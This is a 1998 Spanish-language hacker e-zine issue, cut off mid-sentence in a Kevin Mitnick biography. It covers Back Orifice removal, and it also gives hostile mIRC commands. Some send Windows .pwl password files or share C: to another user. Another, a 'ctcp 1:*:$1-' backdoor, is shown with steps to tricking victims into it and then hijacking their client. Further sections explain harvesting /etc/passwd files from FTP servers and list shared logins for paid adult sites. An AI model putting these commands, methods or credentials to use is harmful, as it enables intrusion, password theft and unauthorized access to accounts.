zed4:(zed4.txt):19/11/1998 << Back To zed4

««««««««««««««««««««««««« « ZeD-wOrLd-EzInE num.4 « ««««««««««««««««««««««««« Una vez mas estoy aqui con todos vosotros,espero que la corta (al menos en mi opinion) espera que os he hecho sufrir aya merecido la pena y cojais este nuevo numero con ganas. Cada vez son mas personas las que colaboran con este vuestro e-zine (gracias a dios,jeje). Bueno me dejo de royos y os dejo con los contenidos de este numero 4. byez. Si quieres colaborar con el e-zine mandame tu documento en formato TXT a: zed@mixmail.com Distribuidores oficiles del ezine: ZeD-wOrLd-----http://www.angelfire.com/ak/HACKZED/ZED2.html La casa de LordVader-----(web no disponible momentaneamente) El rincon del Dr.CyBeR----http://personales.mundivia.es/pedroj52 HaCk`S-wEb-RiNg (la web oficial)-----http://come.to/HaCkS-wEb-RiNg colaboradores de este numero: ToMaCHeLi--------http://members.tripod.com/~tomacheli Dr.CyBeR---------http://personales.mundivia.es/pedroj52 []KHAN[]---------┐?┐?┐?┐?┐?┐?┐┐?┐?┐?┐?┐?┐?┐?┐?┐?┐?┐?┐?┐ LiNks InTeReSaNtEs----- http://raregazz.acapulco.uagro.mx (raregazz) http://come.to/HaCkS-wEb-RiNg (web oficial del grupo latino HaCk`S-wEb-RiNg) http://members.tripod.com/~newkers (web del grupo THE NEWKERS) [[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] «««««««««««««««««««««««««««««««««««««««««««««««« « NOTA: « « aunque lo digo en todos los numeros,me gusta « « repetirlo,todo lo que esta en este,como en « « otros numeros atrasados,es meramente « « educativo,no incito a nadie a usar lo que se « « brinda aqui,ademas algunos de estos textos « « han sido copiados de otros autores y/o « « traducidos por mi,si un texto es tullo y no « « quieres que este aqui,dimelo y lo quitare de « « la edicion de este numero inmediatamente « «««««««««««««««««««««««««««««««««««««««««««««««« [[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] contenidos de este numero------------------------------------------------------------ 1.Breve introduccion de el realizador del e-zine (osea yo) 2.Contenidos (osea esto que estas leyendo) 3.Maneras de colarse (y prevenirse) en un HD atraves del IRC (por:ToMACHeLi y ZeD) 4.Uso del FTP para obtener ficheros de password (por el Dr.CyBeR) 5.Tipos de hackers (opinion personal)(por:ZeD) 6.Listado de passwords XxX 7.Historia "del chacal de la red" (Kevin Mitnick)(sacado de RAREGAZZ) 8.Segunda parte del curso de antivirus 9.Hacking a Scytale (por: []KHAN[]) 10.Troyanos (Netbus)(por: []KHAN[]) 11.Noticias 12.Despedida y cierre -------------------------------------------------------------------------------------- [[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] 0101010101010101010101010101010101010101 ú MANERAS DE COLARSE (y prevenirse) EN ú ú UN HD ATRAVES DEL IRC ú 0101010101010101010101010101010101010101 POR: ToMaCHeLi--(http://members.tripod.com/~tomacheli) Y ZeD------(http://www.angelfire.com/ak/HACKZED/ZED2.html) MIEMBROS DEL HaCk`S-wEb-RiNg--(http://come.to/HaCkS-wEb-RiNg) ╞╞╞╞╞╞╞╞╞╞╞╞╞╞ INTRODUCCION ╞ ╞╞╞╞╞╞╞╞╞╞╞╞╞╞ Devido al creciente aumento de maneras que existen de entrar y/o controlar computadoras ejenas atraves del irc,nos hemos decidido a escribir este articulo para la raregazz. En el trataremos de explicar las formas que hay para introducirse,controlar.... un ordenador de forma remota atraves del irc. Si quieres comentarnos algo,aqui tienes nuestros mails ToMaCHeLi----tomacheli@geocities.com ZeD----zed@mixmail.com ╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞ FIN D LA INTRODUCCION ╞ ╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞╞ BACK ORIFICE. -------------------------------------- El Back Orifice lo creo no hace demasiado tiempo un grupo de hackers americanos con el fin de poder entrar en cualquier ordenador sabiendo tan solo la IP del usuario. Si te mandan un .EXE NO LO EJECUTES A MENOS QUE ESTES COMPLETAMENTE SEGURO DE LO QUE ES. Muchas personas estan propagando por inet el programa SERVER de diversas maneras (lo mas extendido es por el IRC). Y aqui entra en papel el ignorante internauta que se dedica a ejecutarlo en su maquina creyendo que que es un autoextractor de fotos X :). Una vez ejecutado íSORPRESA!, el archivo desaparece ┐?┐?┐? otia ┐?┐?┐?, y la pobre victima piensa, (bah, me habra llegado defectuoso el archivo), y no le da importancia. Si, pues chaval FELICIDADES acabas de meter un troyano en tu sistema :), cualquiera que sepa tu IP podra hacer en tu PCera casi lo que le de la gana. Tas cubierto de gloria :)) (mas bien de mierda que OTROS te han tirao encima). El troyano en cuestion funciona de la siguiente manera: cuando ejecutas el .EXE este instala un programa que se llama (espacio).exe y borra el ejecutable que te han pasado. Cada vez que reinicies tu windo2 (solo funciona en este sistema)el troyano se auntoinstalara y se cargara en memoria (osea que olvidate de borrar el archivo (espacio).exe,por que no funcionara). El troyano deja abierto un puerto en tu sistema LIBRE DE CUALQUIER PROTECCION. este es un puerto llamado "31173" (sin comillas)(31173=elite) Atraves de un programa que debe tener la persona que quiere acceder a tu computadora, este accedera directamente a tu c:\ atraves de unos comandos muy simples,pudiendo hacer lo que le de la gana dentro de tu ordenador,subir y bajar archivos,abrir mas puertos,ajecutar programas,incluso formatear el disco duro. Si notas que te esta pasando alguna de estas cosas lo que puedes hacer es lo siguiente: desconectate de internet y procede a borrar el troyano de la siguiente manera: Pa que lo pilles rapido, el archivo se mueve del directorio donde esta y va a parar al directorio :\windows\system convertido en (espacio).exe y ademas en el editor registros (REGEDIT), carpeta RunServices (puede ser que este en otra carpeta) se incorpora la siguiente linea en DATOS: "(espacio).exe", para que nada mas arrancar el ventanucos el troyano quede en memoria. Y diras bah, pos entonces borro el archivo (espacio).exe y yasta. Si hijo si, prueba y veras, ni flowers, al tenerlo en memoria no deja borrarlo. Y entonces??, a jodese jejeje. NO, TRANQUILO HAY UNA SOLUCION (por lo menos a mi me va). Pero eso te lo dire mas adelante, ahora sigue leyendo.... ┐Como puedo saber si tengo el troyano en el sistema? ---------------------------------------------------- La manera mas facil que hay es utilizar el programa CLIENT (cliente) apuntando a la direccion IP 127.0.0.1 que es tu propia maquina, no se precisa que estes conectado a inet. Cuando ya hallas apuntado a esta IP, desde el cliente de BO manda un PING, si no te responde nada, vale estas limpio y no tienes el troyano, pero si te pone algo como esto: ------- Packet received from 127.0.0.1 port 31337 ------- !PONG!1.20!DEFAULT! ------- End of data ------- Opssss, estas jodio, tan colao el troyano... ***************************************************************************** Nota: Si no lo tienes en el sistema puedes metertelo y probar las maravillas y putadas que te pueden hacer los demas (haciendotelas a ti mismo) ;) y sin ningun peligro al no estar conectado a inet. ***************************************************************************** Vale lo tengo y estoy muy asustao ┐como co±o me lo quito? --------------------------------------------------------- Puede que algunos ya lo hallais descubierto, para mi fue facil, la verdad. Ya sabemos que al ejecutar el archivo del SERVER, este se convierte en (espacio).exe y va a parar al directorio :\windows\system. (OJO, hay una manera de configurar este nombre y es posible que no siempre el troyano sea el (espacio).exe) Vale, como he dicho antes si intentas borrarlo, nanai, por que ya esta en memoria, asi que lo mas normal es pensar que puede haber una linea donde hace que se ejecute el troyano en el archivo SYSTEM.INI o WIN.INI al iniciar el ventanucos. Pos fui a buscarlo por alli y NOP nada de nada, lo siguiente que pense es buscarlo en el editor de registros (REGEDIT), pos palli voy, en el menu pincho: EDICION/BUSCAR/ pongo (espacio).exe y activo CLAVES, VALORES y DATOS y íTACHAN! en una carpeta llamada RunServices (sigo diciendo que puede estar en otra carpeta) aparece en DATOS el nombre del archivito íYA LO TENEMOS! solo queda eliminar la linea de DATOS para ello pincha donde pone el NOMBRE (suele ser (predeterminado)) y eliminalo, (la carpeta no la borres) una vez eliminado ya puedes cerrar la ventana del editor de registros (Nota: es posible que en la busqueda aparezcan mas (espacio).exe pero solo debes borrar el de la carpeta RunServices o otras en las que pueda estar y sepas que es la que carga el troyano). Con todo esto hemos conseguido que la proxima vez que iniciemos el ventanucos no se cargue en memoria el troyano, con lo que ya podras ir al directorio :windows\system y borrar el archivo (espacio).exe (no lo vuelvas a ejecutar o se te metera otra vez en el registro). Y por fin te has librado del troyano. Existen programas que dicen borrar este troyano,pero ES MENTIRA la mayoria (si no todos)llevan alguna clase de virus dentro,osea que cambiaras este virus por otro,por lo que no habras logrado mucho :( SCRIPTS. ------------------- Para alguien que sepa scripting le puede resultar muy sencillo controlar tu maquina de forma remota atraves del irc,ya que en algo que puede resultar tan inocente como una opcion para mandar un privado,puede esconder algun comando para que si el esta conectado automaticamente le mandes tu preciado archivo de contrase±as o lo que se le venga en gana en ese momento. Te recomendamos que pilles algun manual de scripting (en INet los hay a patadas) te lo empolles y revises el codigo del script que usas abitualmente,no sea que resulte que cada vez que pides la lista de canales del servidor donde estes estes mandando un archivo a una persona que no quieres que lo tenga. Procura buscar comandos como los siguientes: /send c:\windows\*.pwl cualquier_nick_que_haya_puesto /fserve nick_que_haya_puesto 5 c: o cosas de este estilo que te puedan parecer sospechosas. Estos comandos pueden estar puestos de la siguiente manera Ejemplos: pidiendo la lista de canales: /list /send c:\windows\*.pwl nick_al_que_llegara_el_archivo entrando a un canal: /join #$$?="Entrar en el canal?" /fserve nick_al_que_daras_acceso 5 c: recibiendo un texto (si ponen una determinada frase/palabra en un canal o privado) on *:TEXT:!mandameloya*:#:/dcc send archivo_que_quiera_que_le_llegue $nick " $+ %file $+ " | /inc %fsendp | ignore -tacu5 $wildsite Como puedes ver,estos comandos remotos pueden estar en cualquier sitio del script, para localizarlos lo mas eficiente es buscarlos en la opcion de STATUS,MENUBAR y REMOTE ya que es hay donde suele aver mas cantidad de comandos y es donde es mas dificil de encontrar el comando remoto que hace que lo pases tan mal cuando estas conectado al irc VIRUS DE IRC. -------------------- Si ya sabemos que esto esta + visto que el tebeo,pero es otra manera + ┐nunca se te ha ocurrido investigar estos famosos "virus"? pues a mi si,fijate :o) Si investigas un poco dentro del "script.ini" veras que lo que hace es lo siguiente: esta configurado para que cada vez que entres a un canal le mandes a todos los que estan dentro de ese canal el fichero "script.ini" ┐pero y si reconfiguramos el "script.ini" para que en vez de mandarselo a todo el canal solo le mande a una persona en concreto el famoso "pwl"? esto no es muy dificil de hacer si revisas el codigo del "script.ini" y cambias unos pocos parametros (hay que saber algo de scripting). En el caso del "dmsetup.exe" es algo mas peculiar. El archivo en cuestion es un binario (un ejecutable),por lo tanto tendras que saber programar en el lenguaje que esta echo para poder modificarlo a tu gusto. Detodas maneras el "virus" sin modificar ya es una jodienda de por si,lo que hace es lo siguiente: tiene la particularidad de ser "autoejecutable" osea que no hace falta que lo clikees tu para que este se instale en tu maquina :( Modifica algunas lineas del script.ini para que se autoenvie (igual que el "script.ini") Algunas de las versiones estudiadas actuan con mas particularidad e incluyen pautas para desconectar a un usuario si recibe la frase "tis to I who seem so sad" (sin comillas claro). Crea copias de si mismo en los directorios c:\windows y c:\mirc (precavido el jeje) Intenta sobreescribir el autoexec.bat para restaurar copias de si mismo cada vez que se reinicie la computadora y por si eso fuera poco encima cambia los directorios de los fserve por c:\mirc lo que puede ser una putada si guardas logs con contrase±as o algo asi en alguno de los subdiretorios de esta carpeta. Eliminar estos dos archivos es algo relativamente simple: para el script.ini: en la linea donde escribes normalmete en el mirc pon lo siguiente: "/unload -rs script.ini" (sin las comillas obviamente) lo que consigues con esto es descargar de la memoria del programa este archivo,pero cuando lo vuelvas a utilizar este se volvera a cargar en memoria,para elimirarlo lo que deves hacer cuando descarges de la memoria el archivo es lo siguiente: donde escribes normalente en el mirc escribe esto: "/removescript.ini" (sin las comillas) y ya estara borrado el "virus" Para el "dmsetup.exe" la cosa cambia un poco: Cierra todos los programas que tengas abiertos,localiza todos los dmsetup.exe que tengas en tu sistema (con la opcion de buscar del menu "inicio" te sera muy facil) y borralos todos,revisa los ficheros "config.sys" y "autoexec.bat" y si tienes dudas sobre alguna linea,sustituye ambos por copias de seguridad. ┐Que no tienes una copia de seguridad?┐pero en que estabas pensando cuando el win2 te dijo que era recomendable hacer un disco de arranque? Luego reinicia el equipo y reinstala el mirc,si sigues sufriendo anomalias a la hora hacer funcionar este programa reinstala el win2 (hazlo encima del que tienes,no hace falta formatear) ATRAVES DE LA LINEA DE COMANDOS. --------------------------------------- Para esto es necesario que usen ingeniaria social con tigo (no te vamos a explicar lo que es la ingenieria social por que es algo sobradamente conocido). Existen una serie de comandos que si los introduces en donde normalmente escribes puedes dejar que el otro controle tu programa del Mirc o que le des acceso a tu c:\ pudiendo hacer los que le venga en gana con el. /fserve su_nick 5 c: /fserve= comando para abrirle una sesion de server al otro usuario su_nick= aqui se pone el nick de la otra persona 5= cantidad de ficheros que puede bajar c:= directorio a partir del que le das acceso Este comando lo que hace es dar acceso completo a tu c:\ (o la carpeta que especifiques) Podra subir,bajar,borrar...ficheros,la unica restriccion que pones es la carpeta apartir de la que tiene acceso,y el numero de archivos que puede bajar. Ademas cuando pones este comando te saldra una ventana (en ingles) diciendote lo que estas haciendo (pero la mayoria de las veces la gente pasa de leerla) ctcp 1:*:$1- Este comando, introducido en los ctcp┤s de mIRC, ejecuta cualkier orden de forma remota.Es como el antiguo /ctpc nick DO. ctcp ==> Client-To-Client-Protocol. Los version, ping, etc... 1 ==> nivel de usuario que ejecuta el ctcp. * ==> como en DOS, comodin que sustituye al ctcp que nos hagan. Podriamos definir aqui un VERSION PING, etc.. $1- ==> con este parametro, mirc toma en consideracion todo lo que nos envien. ┐Mu bonito verdad? pero te estaras preguntando ┐y como coñe se usa? pos mu simple: Hemos conseguido que el pavo introduzca este comando y estamos en el canal #me_mola con el y me apetece que me de OP en este canal,pues ponemos lo siguiente "/ctcp su_nick mode #me_mola +o nuestro_nick" (sin comillas) y bingo,ya tenemos op en el canal #me_mola,pero claro el tio dice "co±o si yo a este no le he dado op" y se mosquea osea que este es un buen momento para hacer un "automass deop" ┐que no sabes como hacerlo? pos en la mayoria de los scripts (un poco modernos) tienes una opcion para hacerlo, "pero esque yo no uso ningun script" ┐pero tu en que mundo vives tio? en http://www.welcome.to/100scripts tienes una coleccion de ellos muy grande,bajate alguno + rapido que inmediatamente :) (si es el ZeD-wOrLd-ScRiPt mejor,jeje) "Bueno pero yo no quiero que me de OP lo que quiero es desconectarle del irc" Bueno pues en ese caso ponlo siguiente: "/ctcp nick_del_personaje quit FRASE QUE TE APETEZCA QUE DIGA AL DESCONECTARSE" (sin las comillas) "┐Y si quiero que diga algo sin que lo escriba?" pues pon esto: "/ctcp nick_del_personaje say FRASE QUE QUIERES QUE DIGA" (sin las comillas) Tienes que tener cuidado con esta clase de "ataques" por que al tio en cuestion se le llenara la ventana de "status" de mensajes diciendole quien sois. Bueno supongo que el concepto lo habreis pillado puesto que es muy simple. Bueno esto es una pequeña muestra de como controlar,colarse...etc... atraves de algo tan usado como es el irc,pero para muchas de estas cosas tienes que elejir a alguien que sea un pardillo en esto del irc,pero los hay,valla si los hay ;) byez [[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] ################################################ ### USO DEL FTP PARA OBTENER FICHEROS PASSWD ### ################################################ By: DrCyber e-mail: drcyber69@hotmail.com WEB: http://personales.mundivia.es/pedroj52 Al acceder a un servidor via FTP, lo que hace este servidor es darnos los ficheros que contiene, y entre todos esos ficherillos esta el mas buscado, el fichero de passwd. Como ahora no hay ""objetivo"" a la vista de nuestros ojos, puedes buscar uno en el siguiente buscador: http://ftpsearch.ntnu.no esta es la WEB del Fast FTP Search v3.7, bueno pues escribid en la casilla de "search for" el fichero a buscar, (podeis probar a escribir passwd) y pulsad sobre "search" hay teneis un monton de ficheros, estudiadlo detenidamente, y daros cuenta que hay teneis ficheros, directorios etc. Los tipos de ficheros pueden ser: -: file (fichero) d: (directorio) A partir de si es fichero o directorio, empezamos con los permisos de usuario, los permisos pueden ser: r: Readable (Lectura) w: Writeable (escritura) x: eXcutable (ejecutable) Bueno ahora volvemos atras con nuestra navegata y escribimos lo mismo de antes pero en la casilla de "limit to path" escribimos "etc" (no comillas claro. 8-D) ¿ Para que ? de este modo nos va a buscar los ficheros passwd del directorio etc. pero claro, atencion, el directorio etc colgara del raiz ¿ verdad ? NO PROBLEMO.... Vamos a afinar la busqueda, volvemos al navegata y por ejemplo le vamos a decir que nos busque dentro de Francia, para ello, en la casilla "limit to domain" escribimos fr, de esta forma en el nombre del servidor ha de aparecer fr, que corresponde a los servidores Franceses (digo Gabachos.. 8-D) y ahora con lo que nos salga -- Bingo !! Ya tenemos el fichero passwd en su lugar correcto, bien, ahora probemos probemos a ver lo que contienen..... Si las claves del fichero estan shadow despedoiros de ese servidor, pero eso es que el fichero elegido ocupa poco, busca los que mas ocupen, asi la info sera mas jugosilla, cuando pilles el fichero que te ineterese, grabalo a tu HD, y no se te olvide apuntar la url del servidor de donde salio... Bueno esto es todo, recordad que todo esto es mera informacion, con ello no se incita a nadie a llevar a cabo actos delictivos o que le pueden traer problemas, el autor no se hace responsable de nada... [[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] µµµµµµµµµµµµµµµµµµµ ñ TIPOS DE HACKERSñ µµµµµµµµµµµµµµµµµµµ documento escrito por ZeD. Puedes subir este documento a tu web,bbs,ftp..... siempre y cuando mantengas este encabezado ┐dudas?┐comentarios?┐sujerencias? zed@mixmail.com http://www.angelfire.com/ak/HACKZED/ZED2.html miembro del HaCk`S-wEb-RiNg (http://come.to/HaCkS-wEb-RiNg) ------------------------------COMIENZA EL TEXTO------------------------------------------------- Bueno puede que alomejor esto no sea lo que esperes que sea,me explico. Existen muchos documentos explicando las diferencias que existen entre un hacker,un carcker....┐pero te has parado a pensar las clases de hackers que hay?. Pr que aunque no lo creas,dentro del mundo del hacking existen muchos tipos de hackers,no todos se dedican a entrar en sistemas. (que conste que este documento es una opinion propia,cada uno que piense lo que quiera) En mi opinion lostipos que exsisten son los siguientes: hackers: son los quetodoel mundo conoce y admira,las personas que tienen la "facilidad" de entrar donde quieran para aprender de ese sistema,copiar archivos (nunca destruirlos),y luego (la mayoria lo hacen) informar al responsable del sistema de los fallos que tiene. hackers de SOs: los hackers de SOs se dedican a averiguar todos los trucos,secretos,fallos.... de un sistema oprativo. puedes pensar lo siguiente -si solo se limitana eso... ┐que es lo que hackean?- la respuesta es simple,┐acaso hackear no es averiguar lo + posible del sistema para poder saber los fallos que tiene,para poder entrar?. bien pues creo que te he contestado a tu pregunta ┐no? ademas,sacr los trucos del SO para personalizarlo al maximo,es una manera de trucar el sistema,por lo tanto HACKEARLO. hackers de IRC: eston la mayoria de las veces son lo que llamamos lamers. la gran parte de las veces esto es cierto,pero no siempre. en mi opinion un hacker de IRC,es alguien que sabe conseguir lo que se proponga siempre y cuando este dentro de este mundo; contrase±as,op,acceder a otra computadora + de lo que le permite ese usuario.... en mi opinion a los que se dedican a este mundo (que al fin y al cabo no esta tan alejado del mundo del hacking) no deveria de considerarseles LAMERS,puesto que hay que aprender muchos comandos,tacticas,trucos y sobre todoconocer los fallos que puedan tener, sino todos,la mayoria de los scripts que circulan por la red. con estonoestoy defendiendo a los lamers,pero tampoco les critico son jente que aun queriendo ser un hacker,les gusta que se lo den todo echo, estola gran parte de las veces es devido a que en el mundo de la informatica han crecido con el win2 o sea "instalar y listo",a esa jente les recomiendo que se expandan,que dejen un poco de lado al win2 y se instalen LINUX para que vean que en el mundo de la informatica,no todo es PUG & PLAY. hackers programadores: que te creias┐que todos los que hacen programas para hackear o crackear,entran en sistemas? pues no amiguito mio :) de eso nada muchos de los programadores que hacen programas para averiguar claves,escanear puertos, crear diccionarios....etc,no los usan simplemente hacen los programas (aunque suene raro es asi) Bueno pues esto son solo algunos ejemplos para quete hagas a la idea de que,en el mundo del hacking,no todo es entrar en un sistema,se pueden hacer muchas otras cosas que sin duda(al menos para mi) ayudan mucho a este mundo en constante desarroyo Aunque ultimamente parece estar de moda ser hacker,aprender a entrar en ordenadores para borrar archivos y meter virus,las cosas no son asi. Si de verdad quieres ser un hacker,no hace falta que entres en un sistema y le formatees el HD con un troyano para que yo te considere un hacker,al contrario para mi esa jente son los DELINCUENTES que dan mala fama a las personas que entran,miran y se van y asa jente es a la que yo llamo DELINCUENTE,por que en el fondo lo son,si deverdad quieres ser un hacker no hagas cosas que produzcan desastres en computadoras,es mas priductivo que informes al administrador del sistema de los fallos que tiene y con eso ganaras como minimo mi respeto y seguro que el de mucha mas jente que opina como yo. Con esto no pretendo convencer a nadie,simplemente es una opinion reflejada en un documento que puede servir para que mucha jente se de cuenta,que hay mucha diferencia entre un hacker y otro,aunque a ambos se les llame igual,muchas veces no los son. ----------------------------FINALIZA EL TEXTO---------------------------------------------------- ZeD http://www.angelfire.com/ak/HACKZED/ZED2.html miembro del HaCk`S-wEb-RiNg (http://come.to/HaCkS-wEb-RiNg) [[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] {{{{{{{{{{PASWORDS XxXxXxX}}}}}}}}}}}}}}} NOTA:si alguno de estos passwords falla,no te extra±es,las contrase±as las cambian muy amenudo,por lo tanto no me mandes e-mails dciendome que las direccion no funcionan http://www.lovezoo.com/members/zoo/ login:bimbo pass:bimbo http://www.shockingteens.com/members/shockingteens/ login:batcave Pass:batcave http://www.100sex.com/members/showcase/showcase2.html L:access P:hyt66 ver:Sep 19, 98 http://www.111sexstreet.com/private/sex02.html L:youcantget P:ridofagentx ver:Sep 19, 98 http://www.111sexstreet.com/private/sex02.html L:gigi P:1234 ver:Sep 19, 98 http://www.111sexstreet.com/private/sex02.html L:rrrr P:rrrr ver:Sep 19, 98 http://www.18hardcore.com/MEMBERS/mpics/barely18.htm L:none P:none ver:Sep 19, 98 http://www.200pix.com/members/ L:guest P:guest ver:Sep 19, 98 http://www.200pix.com/members/ L:test P:account ver:Sep 19, 98 http://www.2sexy.com/members/membersindex.html L:madeline P:madeline ver:Sep 19, 98 http://www.40plus50plus.com/members/news.html L:alonso P:alonso ver:Sep 19,98 http://www.69time.com/hardsex/index.html L:bobbijo P:bobbijo ver:Sep 19, 98 http://www.adrianna.com/private/gallery.htm L:alley P:cat ver:Sep 19, 98 http://www.adult-perversions.com/members/ L:godflesh P:coolie292 ver:Sep 19, 98 http://www.adult-perversions.com/members/ L:dera123 P:towed972 ver:Sep 19, 98 http://www.adult-perversions.com/members/ L:younger P:editor563 ver:Sep 19,98 http://www.allthatass.com/private-club/allthatass-index.html L:deep P:throat ver:Sep 19, 98 http://www.angelsweb.com/members/mmain.htm L:qwerty P:ytrewq ver:Sep 19, 98 http://www.aphouse.com/frames/subscribers/sub_index.html L:nikki P:nikki ver:Sep 19, 98 http://www.aphouse.com/frames/subscribers/sub_index.html L:aaaaa P:aaaaa ver:Sep 19, 98 http://www.appetite4sex.com/members/index.html L:topgun P:topgun ver:Sep 19, 98 http://www.appetite4sex.com/members/index.html L:elvis P:elvis ver:Sep 19, 98 http://www.ayana.com/private/ L:frown P:mom ver:Sep 19, 98 http://www.backdoorbimbos.com/members/index.html L:anonymous P:anonymous ver:Sep 19, 98 http://www.backdoorbimbos.com/members/index.html L:bim P:bo ver:Sep 19, 98 http://bserver.amkingdom.com/protected/mea1x.htm L:evan P:nine ver:Sep 19, 98 http://www.bunsoffun.com/members/index.html L:new P:spanky ver:Sep 19, 98 http://www.califbodies.com/members/index.html L:xxlustyxx P:lusty ver:Sep 19, 98 http://www.celebritypornostars.com/private/gallery.html L:marzbarz P:fastporn ver:Sep 19, 98 http://www.celebritypornostars.com/private/gallery.html L:letmein P:letmein ver:Sep 19, 98 http://www.centerfoldgold.com/members/index.shtml L:billy P:billy ver:Sep 19, 98 http://www.centerfoldgold.com/members/index.shtml L:55555 P:12345 ver:Sep 19, 98 http://www.hornybitches.com/payed L:peru P:peru ver:Sep 19, 98 http://hot4you.netaxs.com/members L:gary P:mysmut ver:Sep 19, 98 http://www.hotbody.com/members L:good4 P:1234 ver:Sep 19, 98 http://www.hotbody.com/members L:good6 P:1234 ver:Sep 19, 98 http://www.hotbody.com/members L:good5 P:1234 ver:Sep 19, 98 http://www.inter-racial.com/membersdmr/ L:eric P:eric ver:Sep 19, 98 http://www.inter-racial.com/membersdmr/ L:scott P:scott ver:Sep 19, 98 http://www.inter-racial.com/membersdmr/ L:raven P:raven ver:Sep 19, 98 http://www.internationalspice.com/members/ L:rammelzee P:dondi ver:Sep 19, 98 http://www.itsreal.com/members/ L:1 P:1 ver:Sep 19, 98 http://www.itsreal.com/members L:patti P:patti ver:Sep 19, 98 http://www.itsreal.com/members L:special1 P:special ver:Sep 19, 98 http://www.itsreal.com/members/ L:micky P:micky ver:Sep 19, 98 http://www.itsreal.com/members/ L:doggie P:doggie ver:Sep 19, 98 http://www.itsreal.com/members/ L:noah P:noah ver:Sep 19,98 http://www.itsreal.com/members L:haze P:haze ver:Sep 19, 98 http://www.itsreal.com/members/ L:elle P:elle ver:Sep 19,98 http://www.itsreal.com/members/ L:cola P:cola ver:Sep 19,98 http://www.itsreal.com/members/ L:pablo P:pablo ver:Sep 19, 98 [[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ │ │ │ La Historia del Chacal de la Red │ │ │ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ NOTA DE LA REDACCION (osea de ZeD): Este texto lo he bajado de la web oficial de RAREGAZZ,a la cual podeis hacceder desde esta direccion: http://raregazz.acapulco.uagro.mx Como Hacker la carrera de Kevin Mitnick comenzo a los 16 a±os, cuando -obsesionado por las redes de computadoras- rompio la seguridad del sistema administrativo de su colegio. Escrito por: Gilberto Pagua Mr. Mitnick. Todo aquel que sea conceptualizado como un Internauta se caracteriza por utilizar un telefono, un modem y una computadora para muchos fines diferentes: Divertirnos, informarnos, estudiar, cocinar, planificar viajes y otras actividades que amplian nuestro quehacer diario. Para Kevin Mitnick el quehacer diario en sus ultimos diez a±os fue el explorar y "explotar" computadoras ajenas y sistemas telefonicos. ┐Su profesion? "Hacker" de nacimiento. Este "terrorista electronico", como lo cataloga el Departamento de Justicia de los Estados Unidos, conocido en los medios como el "Condor", fue capaz de crear numeros telefonicos imposibles de facturar (para la compa±ia telefonica el era James Bond, con un numero que terminaba en 007), pudo apropiarse de 20.000 numeros de tarjetas de credito de habitantes de California y burlarse del FBI por mas de dos a±os con solo un telefono celular alterado y un computador portatil. Es la peor pesadilla de las empresas de telefonia. Es sospechoso de robar el software de mas de media docena de fabricantes de telefonos celulares y tenia el control de tres oficinas centrales de telefonos en Manhattan y de todos los centros de conmutacion de California, dandole la habilidad de escuchar cualquier conversacion telefonica o, si no eras una persona de su agrado, modificar el telefono de tu casa de tal manera que, cada vez que levantaras el auricular, una grabadora pedia que depositaras 25 centavos. ┐Como se forma un Hacker? Como Hacker, la carrera de Mitnick tiene sus inicios en 1980 cuando apenas contaba 16 a±os y, obsesionado por las redes de computadoras, rompio la seguridad del sistema administrativo de su colegio, pero no para alterar sus notas, lo hizo "solo para mirar". Su bautizo como infractor de la ley fue en 1981. Junto a dos amigos entro fisicamente a las oficinas de COSMOS de Pacific Bell. COSMOS (Computer System for Mainframe Operations) era una base de datos utilizada por la mayor parte de las compa±ias telefonicas norteamericanas para controlar el registro de llamadas. Una vez dentro de las oficinas obtuvieron la lista de claves de seguridad, la combinacion de las puertas de acceso de varias sucursales y manuales del sistema COSMOS. La informacion robada tenia un valor equivalente a los 200 mil dolares. Fueron delatados por la novia de uno de los amigos y debido a su minoria de edad una Corte Juvenil lo sentencio a tres meses de carcel y a un a±o bajo libertad condicional. Luego de cumplido el periodo de tres meses el oficial custodio encargado de su caso encontro que su telefono fue desconectado y que en la compa±ia telefonica no habia ningun registro de el. Sus objetivos iban creciendo a cada paso y en 1982 entro ilegalmente, via modem, a la computadora del North American Air Defense Command en Colorado. Antes de entrar altero el programa encargado de rastrear la procedencia de las llamadas y desvio el rastro de su llamada a otro lugar. El FBI, creyendo que habia hallado a Mitnick, allano la casa de unos inmigrantes que estaban viendo television. Un a±o mas tarde fue arrestado de nuevo cuando era estudiante de la Universidad del Sur de California. En esta ocasion entro ilegalmente a ARPAnet (la predecesora de Internet) y trato de accesar a la computadora del Pentagono. Lo sentenciaron a seis meses de carcel en una prision juvenil en California. En 1987, luego de tratar de poner su vida en orden, cayo ante la tentacion y fue acusado, en Santa Cruz California, de invadir el sistema de la compa±ia Microcorp Systems. Lo sentenciaron a tres a±os de libertad condicional y luego de la sentencia su expediente desaparecio de la computadora de la policia local. Luego busco trabajo en lo que mejor sabia hacer y solicito empleo en el Security Pacific Bank como encargado de la seguridad de la red del banco. El banco lo rechazo por sus antecedentes penales y Mitnick falsifico un balance general del banco donde se mostraban perdidas por 400 millones de dolares y trato de enviarlo por la red. Afortunadamente el administrador de la red detuvo el balance antes de que viera la luz. Ese mismo a±o inicio el escandalo que lo lanzo a la fama. Durante meses observo secretamente el correo electronico de los miembros del departamento de seguridad de 